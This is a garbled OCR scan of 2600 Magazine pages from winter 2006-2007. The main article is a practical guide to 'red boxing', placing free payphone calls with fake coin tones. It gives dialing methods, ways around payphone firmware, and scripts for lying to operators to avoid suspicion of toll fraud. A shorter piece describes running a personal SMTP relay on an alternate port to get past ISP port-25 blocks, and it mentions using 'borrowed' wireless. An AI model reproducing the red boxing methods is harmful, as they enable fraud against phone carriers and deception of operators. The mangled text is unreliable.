ifn_read ( cbuf , Ibyt , ibuf , ebuf ) ;
while ( 1 ) {
1 * read data into the fle buf fer * /
/ * loop t o process bit groups i n cbuf * 1
Continued on page 48
Winter 2006-2007P
g
e 1 9
R e d 8 a x i n 9
R e v e a l e d
by Royal t hi nk about what they were wai t i ng for on the l i ne;
anonymousroyal @gmai l . com you may be mi ssi ng the key to what made i t al l
Disclaimer: The i nformati on contai ned i n t hi s poss i bl e. You can' t start pl ayi ng your tones at any
art i cl e i s for i nformat i onal purposes onl y. Red gi ven t i me; you fi rst need to know the rate of the
boxi ng i s i l l egal and a form of tol l fraud. I di s cl ai m cal l . Soon after di al i ng t he number, t he automdted
al l respons i bi l i ty and l i abi l i ty for any i l l ega l acti vi ty prompt for the amount to deposi t came on t he l i ne,
based on the i nformati on contai ned i n th i s art i cl e. whi cb i s al so the system that veri fi es your coi ns by
Red boxi ng i s a topi c i n t he phreaki ng scene that l i sten i ng for the tones that t he payphone, or your red
you ' ve probabl y read up on many ti mes before i n box, pl ays down t he l i ne: t he Automated Coi n Tol l
vari ous text fi l es a n d art i cl es, both onl i ne a n d i n System (ACTS) . I n other cases, a l i ve operator woul d
magazi nes. Because of that, you ' re probabl y not come on t he l i ne i nstead, but you ' d sti l l be asked for
expecti ng much by readi ng yet another arti cl e on t he amount to depos i t . Even wi t h t he operator on
t hi s subj ect. On t he contrary, t hi s art i cl e wi l l provi de the l i ne, ACTS was t her e as wel l , so r ed boxi ng was
you wi th everyth i ng you need to know about red sti l l an opti on as l ong as the operator di dn' t suspect
boxi ng today, beyond j ust answer i ng t be s i mpl e tol l fraud. Now that we' ve covered t he mai n t hi ng
questi on, " Can I sti l l red box? " I ' m actual l y goi ng t hat makes red boxi ng possi bl e, l et ' s go over why
to expl ai n how you can sti l l do i t . I n thi s art i cl e, some peopl e questi on i ts pl aus i bi l i ty.
I wi l l expl ai n why red boxi ng is sti l l poss i bl e and The Cause of the Confusion
what has changed si nce a few years ago. I wi l l al so Unti l a few years ago, gett i ng ACTS on t he l i ne
go over many ways of accompl i s hi ng t hi s easy task, was s i mpl e. Al l you had to do was di al a l ong di stance
i ncl udi ng a few tri cks and some other advi ce you number and wai t to be prompted for t he amount to
can use when t he necessary coi n prompt does n' t deposi t by ei t her an automated ACTS prompt or a
come on t he l i ne. l i ve operator. I n bot h cases, i t was very si mpl e and
Note: A l ot of the i nformati on you ar e about t o anybody cou l d do i t as l ong as t hey had a r ed box t o
read i s based on Ver i zon payphones, so keep that pl ay the necessary tones. The reason that thi s was so
i n mi nd i f any i nformati on seems i naccurate for easy was because dur i ng t hi s t i me, al l l ong di stance
payphones from other provi ders. cal l s by coi n were handl ed by AT&T t hroughout t he
Red boxi ng, as most of you shoul d al ready country, and therefore you wou l d get t hei r ACTS
know, i s a s i mpl e method of pl aci ng free cal l s on on the l i ne whenever you di al ed a l ong di st ance
, payphones us i ng t he tones that a payphone gener- number. Unfort unatel y, t hi ngs changed wi t h t i me.
ates when coi ns ar e i nserted. I f you were unaware Accordi ng to t hei r news rel ease on J une 5, 2 002,
of th i s, then you shoul d do some readi ng on t he ( ht t p: //www. att . com/news/2 002/06/05 - 1 0 5 3 9) .
subj ect before conti nui ng further, otherwi se you AT& T began phasi ng out t hei r ACTS as the months
may not understand t he i nformati on i n thi s art i cl e. went by, start i ng wi t h the states t hat had t he most
For those of you who have al ready read t he many coi n l ong di stance cal l i ng. Duri ng t hi s ti me, as l ong
text fi l es and arti cl es out there, you may recal l some as the pay phone you wer e us i ng was n' t phased
of the more recent ones cl ai mi ng that red boxi ng out yet, a recorded message woul d come on t he
i s ei t her obsol ete or can sti l l be accompl i shed but l i ne before your cal l was compl eted and tel l you
wi th certai n l i mi tat i ons. Regardl ess of what you may t bat the payphone you wer e us i ng woul d soon no
have read, the t r ut h i s t hat i t i s st i l l poss i bl e today. l onger accept coi ns for AT&T l ong di stance ca l l s,
What Makes Red Boxi ng Possi bl e suggest i ng t he use of a prepai d cal l i ng card or other
Th i nk back to the "good 01 ' days" when red pJYllent method as a substi t ute. Sure enough t hi s
boxi ng was a f.ld i n t he phreaki ng scene. Everyone event ual l y happened.
had t hei r modi fi ed tone di al er, mi crocassette Now wi thout AT&T' s ACTS i n pl ace, l ong
recorder, or ot fwr form of r ed box devi ce at t he di stance cal l s by coi n have to be handl ed di fferent l y.
ready, di al i ng away at the nearest payphorle. But So i f you di al d l ong di st .ce number on a pay phone
'-Pa
g
e 20 2600 Ma
g
azine
that formal l y gave you the automated ACTS prompt BaCOT stands for Bel l Owned Coi n Operated
or an AT&T operator request i ng coi ns, you wi l l Tel ephone, Th i s payphone i s very standard and docs
i nstead get routed to an i ntercept (an error message) , not have any fi rmware programmed i n i t to i nterfere
or be prompted for coi ns from the payphone i tsel L wi t h what you di al , I n a l ot of areas, these were the
Once peopl e started gett i ng thi s i nstead of the AT& T or i gi nal payphones i ntroduced before newer tech-
prompt they were used to, many j umped to concl u- nol ogy came out . You shou l d be abl e t o tel l i f you ' re
s i c1s and cl ai nwd red boxi ng as obsol ete, Other on one of these phones when you di al ; there won ' t
peopl e cl ai med t hat red boxi ng i s onl y poss i bl e be any i nternal recordi ngs or modem di al i ng after
through a l i ve operator, However, l i ke I sai d before, you di dl a phone number. You shou l d al so be abl e
red boxi ng i s st i l l possi bl e and usi ng H l i ve operator to break the di al tone by tappi ng the swi tch hook,
i s not al ways necessary, For al l of these redsons, t hi s is the payphone that
How I t' s Still Possible shou l d gi ve you the l east amount of troubl e when
So how can you sti l l red box? I n order to answer usi ng your red box,
that questi on, I fi rst need to go over LATAs, In Cdse COCOT stands for Customer Owned Coi n
you ' re not fami l i iu wi t h t hat term, LATA stands Operated Tel ephone, Thi s type of payphone rarel y
for Local Access and Transport Area , LATAs ar e uses network control si gnal i ng or supports ACTS,
geographi c areas that di ctate how far an I ncum- at l east i n the us There ar e many types of t hi s
bent Local Exchange Carri er ( I LEC), a carri er such payphone used by di fferent provi ders, The l ogo,
as Veri zon or SBe, can route cal l s, I f a cal l stays i f shown, shoul d represent a Competi ti ve Local
i nsi de of a LATA, i t i s an i ntra- LATA cal l , Al so, i f an Exchange Carri er ( CLEC), whi ch i s s i mpl y a carri er
i ntra-LATA cal l goes beyond a l ocal cal l i ng area, i t i s that competes wi t h an I LEe Fi rmware i n the phone
cal l ed a regi onal tol l cal l ( al so somet i mes referred to determi nes rates, veri fi es coi n payment, and routes
as " l ocal tol l " ) , Cal l s that are pl aced between LATAs cal l s usi ng an i nternal modem, In t hi s common case,
are i nter- LA1A and handl ed by an I nterexchange red boxi ng is not an opt i on, In rare ci rcumstances,
Carri er ( I XC), otherwi se known as a l ong di stance a COCOT may use network control si gna l i ng to
carri er. Di d you get al l of that? Good, then l et ' s communi cate wi t h ACTS, and possi bl y al so l ack
cont i nue, fi rmware, maki ng red boxi ng poss i bl e,
AT&T i ndeed got ri d of t hei r ACTS, maki ng Hybri ds are Bel l -operated payphones l i ke
red boxi ng l ong di stance cal l s a t hi ng of the past BOCOTs, These are usual l y the same phone and
However, many I L ECs sti l l have t hei r own i n pl ace, l ook i denti cal , The di fference i s that these have fi rm-
namel y Ver i zon, SBe, and Qwest Si nce the I LEC i s ware i n them, When di al i ng phone numbers, or even
the carri er runni ng the ACTS you ' re tryi ng to get on the l ocal operator with 0, the fi rmware usual l y ki cks
the l i ne, a l l of your cal l s usual l y need to be i ntra- in and di al s the number for you usi ng an i nternal
LATA. There are di fferent ways you can get ACTS on modem, The probl em wi th t hi s i s that what you di al
t he l i ne and i n some cases you are l i mi ted t o where and what the modem di al s can be two di fferent
you can cal l i n the LATA, thi ngs, For exampl e, on Ver i zon Hybri ds, di al i ng
Types of Pyphones for the l ocal operator wi l l cause the modem to di al
I t ' s very i mportant t o get fami l i ar wi t h the Ver i zon Sel ect Servi ces' Carri er Access Code (CAC)
di fferent types of payphones in order to know whi ch pl us a zero, i n the format 1 01 -XXXX-O, Thi s br i ngs
ones you ' re abl e to red box from, I n fact, wi th the you to a l ong di stance CLEC operator, i nstead of the
newer technol ogy i mpl emented i n more payphones l ocal operator you were supposed to reach, A CLEC
now, you may al so need to know how to red box operator s urel y i s n' t goi ng to do coi n veri fi cati on, so
them, There are four types of payphones that I am there' s no poi nt i n whi ppi ng out your red box,
goi ng to go over: BOCOTs, COCOTs, Hybri ds, and As for Hal f Breeds, they' re even worse than
Hal f Breeds, Hybri ds because t hey l ook and operate mor e l i ke
Bel l owned and operated payphones are usual l y a COCOT, whi ch means more fi rmware t o rui n
t he onl y ones that us e network control si gna l i ng to your day, As you can i magi ne, these phones are a
communi cate wi th ACTS, Therefore, these are the nui sance i n many ways,
ones you normal l y want to l ook for if you want to go On with the Red Boxi ng!
red boxi ng, Your area' s I L EC i s al ways the provi der, Ti me to get i nto what you ' ve a l l been wai t i ng
and i ts l ogo shoul d al ways be shown somewhere on for: the r ed boxi ng! Here I ' l l be showi ng you every
these payphones, maki ng them easy to poi nt out method I know to get ACTS on the l i ne,
The three types of Bel l operated payphones that I ' l l Fi rst of al l , i n order to be abl e to red box, you
go over are BOCOTs, Hybri ds, and Hal f Breeds, must be i n the terri tory of an I L EC that supports
One thi ng to note is that a BOCOT can refer to any ACTS, The onl y I L ECs I know that do thi s areVeri zon,
of these three payphones, but herei n I ' l l be usi ng SBe, and Qwest, al though there coul d be others
thi s term speci fi cal l y for the ones that do not have that I ' m unaware of. I f you ' re unsure whether or not
fi rmware programmed i n t hem, Now that I ' ve made your I LEC supports ACTS, you can s i mpl y try these
that cl ear, l et ' s cont i nue, methods to know for sure, There are al so areas t hat
Winter 2006-2007Page 21
use the ACTS from a di fferent I LEe. For exampl e, sure that t hi s works in Veri zon terri tory. To try t hi s,
Connecti cut is in SNET (Southern New Engl and Tel e- pi ck up the phone and di al 0 pl us the area code
phone) terri tory, yet some of the payphones there and seven di gi t cel l phone number in the format 0
gi ve you a Veri zon ACTS prompt when you di al a NPA-NXX-XXXX. You shoul d get the ACTS prompt
regi onal tol l number. If you sti l l fi nd yoursel f unabl e on the l i ne afterwards. I f you do not, you may want
to red box, you may need to be i n a di fferent area. to try di al i ng i n one of these two other formats:
As I expl ai ned ear l i er, al l cal l s usual l y have to NPA-NXX-XXXX or 1 - NPA-NXX-XXXX. I f those al so
be i ntra-LATA si nce the I LECs are the onl y carri ers fai l , there are three possi bl e reasons. One reason
support i ng ACTS now. However, as you may al ready cou l d si mpl y be that the I LEC does n' t support ACTS
know, most di rect di al ed l ocal cal l s are usual l y veri - wi th t hese parti cul ar di al i ng methods. The second
fi ed by a ground test, meani ng that you must deposi t reason cou l d center around the cel l phone' s carri er.
the money before you fi ni sh di al i ng the number i n I n Veri zon terri tory, i f t he cel l phone you are ca l l i ng
order for the test t o pass. That l eaves onl y one other i sn' t wi th Veri zon Wi rel ess, you wi l l not be prompted
ki nd of cal l : regi onal tol l . These cal l s al ways requi re by ACTS. The same coul d be true for other I L ECs
you to press 1 before the number, si nce there i s and t hei r wi rel ess carri ers. The l ast reason coul d be
i ndeed a regi onal "tol l " for the cal l . Di rect di al i ng because of the parti cul ar type of payphone you are
a regi onal tol l number shoul d br i ng you to an ACTS usi ng. Remember what I tol d you about Hybri ds and
prompt most of the ti me, and i t ' s the easi est way of Hal f Breeds? Wel l , i f you ' re on one of those phones,
gett i ng one on the l i ne so you can start usi ng your t he fi rmware i s most l i kel y i nterferi ng wi th what
red box. Unfortunatel y, the regi onal tol l method you ' re tryi ng to di al . I ' l l be expl ai ni ng how to deal
l eaves out cal l s i n your l ocal cal l i ng area, and there wi th these types of payphones a l i ttl e l ater on.
are goi ng t o be ti mes when you need t o pl ace a One i nterest i ng t hi ng about t hi s method of red
local cal l . Have no fear though, there are sti l l a few boxi ng is that the cal l may someti mes be unl i m-
ways that you can red box l ocal l y. i ted, meani ng that you can stay connected to you r
Another way t o get an automated ACTS prompt party i ndefi ni tel y. Thi s may onl y be for l ocal cal l s
i s through di rectory assi stance, s o t hi s method wi l l though, because when t he cal l i s l ocal ACTS usual l y
obvi ousl y l i mi t you t o l i sted phone numbers. To do prompts you for 50 cents, whi ch i s often the amount
t hi s, pi ck up the phone and di a1 41 1 . Here i n Massa- for a di rect di al ed l ocal cal l when the money i s veri -
chusetts where I l i ve, di rectory assi stance i s free of fi ed by a ground test.
charge. However in al l other areas there wi l l be a Very recentl y dur i ng HOPE Number Si x, I found
smal l fee. I f you l i ve i n one of these areas, ACTS wi l l out that you can reach ACTS by di al i ng a l ong
prompt you for an amount to deposi t. At thi s poi nt, di stance n umber! You heard that ri ght, you can red
you can use your red box to " pay" the necessary box l ong di stance cal l s! I n New York Ci ty, whi ch i s
amount. I f you don' t want t o use you r r ed box, you in Veri zon terri tory, you ' l l get an automated Veri zon
may al so try tappi ng the swi tch hook very qui ckl y, ACTS prompt for $ 1 . 05 afer di al i ng any i nter-LATA
whi ch i s a tri ck that usual l y onl y works on regul ar number i n the U. S. I nternati onal cal l s are excl uded
BOCOTs, but thi s i s not guaranteed. I f you' re on a from thi s, so you' l l have to make sure that you
Hybri d or Hal f Breed, the fi rmware in the phone al ways di al domesti cal l y. A few fri ends and I devel -
may keep the l i ne on hook for a l onger peri od of oped a theory that Veri zon may be experi menti ng
ti me and i nstead di sconnect the cal l , though t hi s i s wi t h t hei r ACTS and sl owl y i mpl ementi ng i t for l ong
not al ways the case. The reason that t hi s tri ck some- di stance use. Thi s may have somet hi ng to do wi th
ti mes works i s because tappi ng the swi tch hook the recent Veri zon/MCI merge, whi ch gi ves Veri zon
si gnal s the operator to come on the l i ne. But i n t hi s an I XC t o wor k wi th, possi bl y for coi n l ong di stance
case the operator woul d speci fi cal l y be the di rectory cal l s supported by ACTS as wel l . Thi s coul d be bi g
assi stance operator. Pretty cl ever eh? Once you get news if red boxi ng l ong di stance makes a return. Al l
di rectory assi stance on t he l i ne, l ook up t he number we can do i s wai t and see.
you ' re tryi ng to cal l . Thi s can be ei ther a l ocal or That' s al l for ways of gett i ng an automated ACTS
regi onal tol l number. The operator wi l l then put on prompt. Now for usi ng l i ve operators. Onl y you r
the recordi ng that announces the phone number. l ocal operator can do coi n veri fi cat i on. Gett i ng one
Duri ng or after thi s recordi ng, you shoul d be asked on the l i ne i s as easy as di al i ng o. Once you have the
i f you want to pl ace a cal l to thi s number for an operator on the l i ne, you si mpl y gi ve her the l ocal
addi ti onal fee. Choose to do so by coi n deposi t, then or regi onal tol l number you want to cal l and tel l her
wai t for the ACTS prompt to come on the l i ne. Voi l a! you ' re payi ng wi t h coi ns. The operator wi l l t hen tel l
Now you ' re al l set to start red boxi ng the cal l . you t o deposi t the money. You ca n now go ahead
Woul dn' t i t be great i f you coul d si mpl y di al and start pl ayi ng your red box tones, bei ng careful
a l ocal number di rect and sti l l be abl e to red box not to make any other noi ses that coul d make the
the cal l ? Wel l , guess what? You can ! I n some cases, operator suspect tol l fraud. I f that happens, hang up
di al i ng a cel l phone number wi l l br i ng you to an and retry. Once al l of your "coi ns" have been veri -
ACTS prompt, even i f i t' s a l ocal number. I know for fied, the operator wi l l compl ete your cal l . There may
Pge 22 2600 Magazine
be ti mes when the operator wi l l gi ve you a hard that the 555 number is i ncorrect and you ' re cal l i ng
ti me, tel l i ng you to di rect di al the cal l yoursel f. I f a di fferent number. Hal f of the t i me you wi l l be tol d
t hi s happens, you may want t o try maki ng up an t o hang up and redi al . However, i f you ar e asked for
excuse for needi ng the operator to pl ace the cal l the number you want to cal l , g o ahead a n d gi ve i t
for you, such as the keypad bei ng broken, or bei ng up. Now you ' l l be asked for the amount to depos i t
handi capped and i ncapabl e of di al i ng yoursel f. Thi s and you can red box away.
a l l sounds pretty easy, ri ght? Wel l , i t can get even Deal i ng with Hybrids and Half Breeds
easi er! Hybri ds and Hal f Breeds can prevent you from
In Qwest terri tory, you can use di rectory assi s- bei ng abl e to do a l ot of t hi ngs. Some of these t hi ngs
tance to get an operator on the l i ne as wel l . Onl y i n i ncl ude cal l i ng the l ocal operator when you di al
t hi s case, there' s l es s l i kel y a chance of t he operator 0, gett i ng an ACTS prompt when di al i ng 0 pl us a
refusi ng to compl ete your cal l . To do t hi s, di al 41 1 cel l phone number, and even fl ash hooki ng prop
and l ook up any l i sted number. After the number erl y. Unfort unatel y, I don' t have the t i me to i ncl ude
pl ays, choose to pay by coi n and wai t for the ACTS al l of the methods of bypassi ng fi rmware on these
prompt to come on. Thi s t i me, l et the recordi ng pl ay phones. What I wi l l go over is a speci fi c ki nd of
and repeat i tsel f unti l you get another operator on fi rmware bypassi ng techni que t hat takes advantage
the l i ne ( qui ckl y fl ash hooki ng may al so be useful of Verti cal Servi ce Codes (VSCs) . VSCs are customer
here) . Once the new operator comes on, he or di al ed codes preceded by a star (*) , or 1 1 i f you
she wi l l ask you for the amount to deposi t. At t hi s have a rotary phone, t hat access servi ces provi ded
poi nt, ask the operator what number you are cal l i ng, by a l ocal or l ong di stance carri er. *69 Cal l Return,
soundi ng very confused. When he or she tel l s you a servi ce that l ets you cal l back the l ast party who
the number, expl ai n to the operator that t hi s i s not cal l ed you, i s one of the better known VSCs. The
the number you were tryi ng to cal l . You shoul d be three that you can use on Hybri ds ( not Hal f Breeds)
asked for the number you' re cal l i ng now, so go are *67, *82, and *58. I n case you aren' t fami l i ar
ahead and gi ve i t up. When you ' re asked for the wi th these codes, *67 i s for bl ocki ng your Cal l er I D,
amount to deposi t, go ahead and start red boxi ng. *82 i s for unbl ocki ng your Cal l er I D, and *58 i s for
Si nce the fi rst phone number and rate were al ready preventi ng other stati ons on a Mul t i button Key Set
known, and you were al ready goi ng to pl ace a cal l ( MBKS) o n I SDN from accessi ng your cal l . When
wi th coi ns, your cal l shoul d be compl eted wi th no usi ng these, you have to di al t hem i n the styl e for
questi ons asked. I am unaware i f t hi s tri ck works rotary phones, meani ng that you precede them wi th
outsi de of Qwest terri tory, so gi ve i t a try el sewhere 1 1 i nstead of * because the fi rmware i n the Hybri ds
i f you want to fi nd out. prevent that touch tone from reachi ng the di al tone.
You know how di al i ng 0 pl us the number you So you ' l l actual l y be di al i ng 1 1 67, 1 1 82, or 1 1 58.
want t o cal l gi ves you other bi l l i ng opti ons such as To use these VSCs, pi ck up the phone and di al
col l ect, thi rd party, person-to-person, cal l i ng card, one of them. I f you di al 1 1 67 or 1 1 82, you ' l l hear a
and credi t card? Wel l , somet i mes when you tal k stutter di al tone. I f you di a l 1 1 58, the di a l tone wi l l
to someone l i ve, i t ' s a real operator that can do drop, some cl i cki ng wi l l sound, and then your di al
coi n veri fi cati on! To see i f t hi s wi l l work for you, tone wi l l eventual l y be returned. 1 1 58 i n parti cul ar
si mpl y di al 0 and t he number you ar e cal l i ng i n t he i s very strange and I have yet t o understand why i t
format 0 NPA-NXX-XXXX. I f you are brought to an does t hi s, especi al l y consi deri ng i t ' s for I SDN. Once
automated system tel l i ng you your bi l l i ng opti ons, you have di al ed one of the V5Cs, the fi rmware i n
choose to tal k to a l i ve operator. Next, tel l the oper- the Hybri d wi l l no l onger i nterfere. From here,
ator that you want to pay for the cal l wi th coi ns. you can go ahead and di al what you woul d have
If the operator asks you for the amount to deposi t, normal l y been prevented from accessi ng, such as
you ' re al l set to red box the cal l . If not, chances are the l ocal operator by di al i ng o. Unfortunatel y these
you' re out of l uck. codes don ' t work everywhere, so i f they al l fai l , try
I ' m not done yet: here' s one l ast method of gett i ng another l ocat i on. 1 1 58 i n parti cul ar seems to work
an operator on the l i ne. Thi s one i nvol ves usi ng the more ofen i n maj or ci ti es l i ke Boston or New York
555 exchange. I know t hi s works i n Veri zon terri - Ci ty for some reason, so try i t i n those areas as wel l .
tory, bu t am unsure i f i t works anywhere el se. Pi ck As for Hal f Breeds, I ' ve never l earned much about
up the phone and di al an unassi gned number i n these, so I don' t know of any ways around thei r fi rm
exchange 555, i n the format 1 - NPA-555-XXXX. I n ware. Sorry.
a few moments, an operator may come on the l i ne. Other Tricks and Advice
I f you don' t get an operator, or i f the operator tri ed There i s one real l y cool thi ng you can do with
pl aci ng the cal l before you coul d speak, hang up Veri zon' s ACTS that I shoul d share. When you get
and redi al . I f the operator does come on, he or she to the automated ACTS prompt, you can conti nue to
may sound confused or ask i f you ' re cal l i ng a cel l red box i n more " money" past the maxi mum amount
phone. You need to tal k qui ckl y before the operator necessary for the cal l ! Thi s can be done i ndefi n i tel y;
tri es to pl ace thi s i nval i d cal l ! Expl ai n to hi m or her j ust keep pl ayi ng the tones to get more and more
Winter 2006-2007Pge 23
credi ted to your cal l . The more " money"
you add up, the l onger your cal l wi l l be before you
get another ACTS prompt. As far as I know, th i s i s
onl y poss i bl e through Veri zon. For fun, you coul d
actual l y red box i n $ 1 00 worth of tones t o hear i t
say "Thank you, you have one hundred dol l ars credi t
towards overt i me. " Of course, Veri zon woul d be
pretty suspi ci ous i f t hey saw such a l arge amount of
money spent on an ACTS ca l l i n t hei r records.
As for i ssues you mi ght be havi ng, there' s no
need for me to go over the common detai l s of why
your red box mi ght not be worki ng. That i nforma
ti on i s al ready freel y avai l abl e onl i ne. Pl ay your
tones l ouder or softer. Try re-recordi ng t hem t o get
rid of di stort i on. Move your red box cl oser or further
away from the mouthpi ece of the payphone. Try
sol deri ng on a better crystal in your tone di al er. I t
shoul d a l l be common sense to you by now after
a l l these years. However, there is someth i ng I want
to go over about certa i n payphones. Some of them
have thei r own ways of preventi ng red boxi ng. Let
me expl ai n.
There are some payphones that actual l y fi l ter out
the red box frequency from bei ng pl ayed through the
mouthpi ece. You can actual l y hear the phone cl i ck
as it bl ocks these tones every t i me you pl ay them.
Howto Get
When you ' re havi ng troubl e red boxi ng a cal l , a
common probl ems l i ke the ones above aren ' t the
i ssue, thi s j ust may be what ' s caus i ng the troubl e. I f
you ' re sti l l not sure, go to another payphone and try
red boxi ng that one. I f i t works, i t was probabl y the
fi rst payphone fi l teri ng out that frequency. There is
nothi ng you can do about thi s other than use another
payphone. Sure, you cou l d attempt to take the phone
apart or bei ge box onto the physi cal l i ne somewhere,
but who real l y wants to bother doi ng al l of that j ust
to make a payphone cal l ? Getti ng i nsi de the phone
usual l y i sn' t an opti on anyway consi deri ng how wel l
l ocked and secured they are. Someti mes you j ust
have to accept when you ' re beat.
So now you know for certai n that red boxi ng i sn' t
dead yet. I ' ve answered t he questi on "Can I sti l l red
box? " and gone beyond by gi vi ng you al l the known
methods of pul l i ng i t off. What more coul d you ask
for? Hopeful l y now I ' ve answered every questi on you
coul d possi bl y have. Happy red boxi ng . . . and happy
trai l s !
Shouts: av I d, I-baLL, decode/; greyarea,
Lucky225, Natas, WhiteS word, licutis, Not Theory,
Cesssnaa, Lowlec, x64, kurced, Doug from Doug Ti
Athnex, Majestic, BlakeOPS, MurdOc, accident, Tim,
Lamerloe, Elt; Boston 2600.
Cable/DSl lo
by Pirho
shoul d not be attempted or dupl i cated as i t may
Rai se your hand, a l l of you that have a cabl e or
very wel l be a vi ol ati on of your TOS wi th your I SP.
DSL modem. Now how many of you have emai l
I n other words, don' t try t hi s at home!
accounts wi th you r cabl e/DSL provi der? Now
OK
,
here we go.
how many of you have
tri ed to use you r emai l
The company that I work
for has a Mi crosoft
account to send out wi thout bei ng on the cabl e/
exchange server that I obvi ousl y have an account
DSL network?
on ( I shoul d, I bui l t i t) . But I never want to use the
OK, put you r hands down.
exchange servers t o do my SMTP rel ay because
I am goi ng to fi l l you i n on a l i ttl e secret. The
I know that my company not onl y moni tors the
cabl e and DSL compani es a l l have l ocked down
emai l traffi c for spam and vi ruses but al so captures
h
every scrap of mai l that comes i n and out of the
t ei r outgoi ng SMTP access so you can't send
exchange server. The l ast thi ng I want i s someone
out mai l wi th any other company's account other
readi ng my emai l s.
than thei r own. Many a t i me I am out i n the fi el d
We al so have a separate pi ece of hardware
and I need to hook i nto a company's LAN and use
known as a Barracuda Spam Fi rewa l l whi ch
thei r I nternet access t o send out mai l onl y t o be
al l ows us to fi l ter out the spam and any vi r us that
frustrated because my I SP has l ocked out port 2 5
tri es t o come i n through ema i l . I al so know that
to everyone who i sn't on thei r network.
the Barracuda tags the outbound emai l s wi th a
Wel l I got so frustrated I fi nal l y deci ded to
stupi d s i gnature that gi ves a l egal di scl ai mer wi th
take matters i nto my own hands. But fi rst a word
my company's address and i nformati on, so I don' t
from our l egal team. Everythi ng that I am about want to use that.
to expl ai n i s for i nformat i onal purposes onl y and So what's a person to do? Si mpl e, bui l d your
Pge 24 2600 Magazine
our SMTP server and use that to rel ay your messages. Here how to do i t:
Bei ng that I had two computers at my apartment hooked i nto a cabl e modem us i ng a store bought
fi rewal l/swi tch, I bui l t one of them as a wi n 2 k3 box. Si nce i t's a true server now, I have the abi l i ty of
i nsta l l i ng l i S 6. 0 on i t. Si nce l i S is more then j ust a web server, it has the abi l i ty to i nsta l l SMTP servi ce
on i t. Thus al l owi ng me to use it as an open rel ay.
That's when I di scovered the probl em. How do I l ock it down? Why do you need to l ock it down?
Why not l eave i t open? Wel l , for starters, t hi s i s what happens when you l eave an sMTP open as a
rel ay:
Received : from cm2 1 8- 2 5 4 - 8 8 -9 0 . hkcable . com. hk ( [ 2 1 8 . 2 5 4 . 8 8 . 9 0 ] )
by * * * * * * * * * * * * * * *
*
* * * * * * *
*
*
*
*
*
*
* *
* . DYNDNS . ORG with Microsoft
SMTPSVC ( 6 . 0 . 3 7 9 0 . 1 8 3 0 ) ; Wed , 7 Jun 2 0 0 6 0 5 : 4 5 : 1 6 - 0 4 0 0
Received : from dns O . yahoo . com ( dns O . yahoo . com [ 1 0 0 . 1 7 0 . 4 . 2 8 ] ) by 2 1 8 . 2 5 4 . 8 8 . 9 0
with Microsoft SMTPSVC ( 5 . 0 . 2 1 9 5 . 6 8 2 4 ) ; Wed, 0 7 Jun 2 0 0 6 1 0 : 4 2 : 3 9 +0 1 0 0
Received : from dns O . yahoo . com ( dns O . yahoo . com [ 1 8 7 . 1 6 4 . 1 5 2 . 2 3 6 ] ) by 2 1 8 . 2 5 4 . 8 8 . 9 0
with Microsoft SMTPSVC ( 5 . 0 . 2 1 9 5 . 6 8 2 4 ) ; Wed, 0 7 Jun 2 0 0 6 1 2 : 4 0 : 3 9 +0 3 0 0
Received : from dns O . yahoo . com ( dns O . yahoo . com [ 1 0 6 . 7 4 . 2 3 1 . 6 ] ) by 2 1 8 . 2 54 . 8 8 . 9 0
with Microsoft SMTPSVC ( 5 . 0 . 2 1 9 5 . 6 8 2 4 ) ; Wed , 0 7 Jun 2 0 0 6 0 7 : 4 1 : 3 9 - 0 2 0 0
Mes sage-ID : <5 4 7 5 9 6 3 6 6 6 . 9 4 9 1 7 5 2 6 5 9 1 7 0 0 0 7 0 7 0 3 1 @ yahoo . com>
X-Mailer : Microsoft Offce Outlook, Build 1 1 . 0 . 5 5 1 0
Date : Tue , 1 9 Jan 2 0 9 2 1 1 : 1 4 : 0 7 +0 8 0 0
From: [ deleted ] @yahoo . com>
Reply-To : [ deleted ] @yahoo . com>
To : [ deleted ] @yahoo . com . tw
around fundraiser , stovepipe behind bartender, and defned by ballerina are
what made America great ! For example , avocado pit behind waif indicates
that around cleavage befriend bartender beyond rattlesnake . Unlike so many
widows who have made their strawberry-blonde cigar to us . But they need to
remember how inexorably submarine near pickup truck goes to s leep .
You get peopl e from a l l over the worl d sendi ng
out spam to everyone el se l i ke you and me. Not
onl y i s t hi s a terr i bl e t hi ng to get i n your emai l but
i t can send up red fl ags at your I sP when hundreds
of these come i n a n i ght.
What to do? Si mpl e, now turn on authenti ca
t i on. By si mpl y enabl i ng authenti cati on on the
access tab and sett i ng i t to use Wi ndows authen
t i cati on you can now j ust create an account and
safel y send out the ema i l wi t hout havi ng t o worry
about the enti re Tai wanese country sendi ng spam
out t hrough your server.
Ok, that worked. We're al l done, ri ght?
Wrong!
We need to do somet hi ng about port 25 now.
Remember, I SPs are bl ocki ng a l l traffi c on port 25
that's not part of thei r network. So i f I am over at a
fri end's house or usi ng a wi rel ess connecti on that
I "borrowed" from someone, I need to have the
abi l i ty to send out mai l on a port other then 2 5 . I
need a way of fool i ng the I SP to al l ow me to send
out the emai l s.
I n 1 1 5 you can speci fy t he ports that you want
to send out on. By defaul t i t's port 25, but that
does not mean you're l i mi ted to usi ng that.
Under the defaul t SMTP server connecti on
you can go i nto the propert i es and you wi l l be
presented wi t h a l i st of opti ons: General , Access,
Messages, Del i very, LDAP Routi ng, and Secur i ty.
Go i nto the General tab and wi th i n that page
is an Advanced button. From there you have the
abi l i ty to not onl y add and remove more vi rtual
SMTP servers, but to edi t them as wel l .
From here you want to change i t to a port that
i s not goi ng to be i n use by any other appl i cat i on.
I n t hi s case we can chose 465 .
Wait! 465 - that's SSL!
Yes, i t i s the port that SSL i s usi ng. However
you can sti l l uti l i ze it wi thout havi ng SSL confi g
ured. J ust make sure after you're done to open
port 465 on your fi rewal l /router and set i t to go to
the i nsi de I P address of your new server.
Wait! What about the IP address? I sn't it goi ng
t o change?
Why yes i t i s, and t hi s i s the cool part. You
make sure that whatever router you get has the
abi l i ty to use dynami c DNs. Dynami c DNs i s
a servi ce that works the same way regul ar DNS
works but works i n real t i me i nstead of wai t i ng
/n/ amount of t i me for the repl i cati on t o update
( usual l y 24 hours) .
Wi th Dynami c DNs your router wi l l automat i
cal l y update the external DNs servi ce i n real t i me
each t i me your I SP renews you r address. Thi s way
you never have to keep track of an I P address.
That's bas i cal l y i t. Wi th some mi nor tweaki ng
and a decent computer you can eas i l y send
out emai l wi th no probl ems and not have to be
restri cted by those damn cabl e provi ders any
more!
Winter 2006-2007P
g
e 25
What ' s hacki ng? I suppose the defi ni ti on
brought to you at the l owest possi bl e pri ce.
that ' s al ways the easi est to expl ai n - or start
I t's cheaper to buy somethi ng assembl ed than
conversati ons wi th - i s someone who l ooks at
to get i ndi vi dual parts. Over the l ast ten years
